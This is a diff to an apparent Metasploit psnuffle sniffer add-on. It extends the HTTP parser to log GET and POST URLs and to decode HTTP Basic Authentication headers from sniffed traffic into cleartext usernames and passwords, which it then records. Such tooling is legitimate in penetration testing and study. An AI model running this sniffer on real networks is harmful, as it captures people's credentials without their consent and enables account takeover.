diff --git a/data/exploits/psnuffle/url.rb b/data/exploits/psnuffle/url.rb index d90f254caa..d387b69c50 100755 --- a/data/exploits/psnuffle/url.rb +++ b/data/exploits/psnuffle/url.rb @@ -1,22 +1,24 @@ -# Psnuffle password sniffer add-on class for HTTP GET URL's +# Psnuffle password sniffer add-on class for HTTP URLs # part of psnuffle sniffer auxiliary module -# -# Very simple example how to write sniffer extensions -# -# Sniffer class for GET URL's +# +# Sniffer class for GET/POST URLs. +# Also extracts HTTP Basic authentication credentials. +# class SnifferURL < BaseProtocolParser def register_sigs self.sigs = { - :get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i, - :webhost => /^HOST\:\s+([^\n\r]+)/i, + :get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i, + :post => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i, + :webhost => /^HOST:\s+([^\n\r]+)/i, + :basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i, } end def parse(pkt) - # We want to return immediantly if we do not have a packet which is handled by us + # We want to return immediatly if we do not have a packet which is handled by us return unless pkt.is_tcp? - return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80) + return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80) s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt)) self.sigs.each_key do |k| @@ -34,10 +36,16 @@ class SnifferURL < BaseProtocolParser case matched when :webhost sessions[s[:session]].merge!({k => matches}) - if(s[:get]) + if s[:get] print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}") - sessions.delete(s[:session]) - return + end + if s[:post] + print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}") + end + if s[:basic_auth] + s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2) + report_auth_info s + print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}" end when nil # No matches, no saved state @@ -45,4 +53,3 @@ class SnifferURL < BaseProtocolParser end # end of each_key end # end of parse end # end of URL sniffer -